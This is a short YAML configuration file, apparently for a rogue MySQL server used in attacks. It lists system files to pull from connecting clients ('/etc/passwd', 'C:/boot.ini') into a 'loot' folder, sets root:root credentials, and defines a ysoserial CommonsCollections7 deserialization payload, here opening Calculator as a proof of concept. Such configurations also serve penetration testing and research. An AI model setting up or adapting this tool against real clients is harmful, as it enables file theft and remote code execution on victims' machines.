host: 0.0.0.0
port: 3306
version_string: "10.4.13-MariaDB-log"

file_list: ["/etc/passwd", "C:/boot.ini"]
save_path: ./loot
always_read: false

auth: true
users:
  - root: root
  - root: root

jdbc_exploit: false
always_exploit: false
ysoserial_command: ["java", "-jar", "ysoserial-0.0.6-SNAPSHOT-all.jar", "CommonsCollections7", 'open -a Calculator']
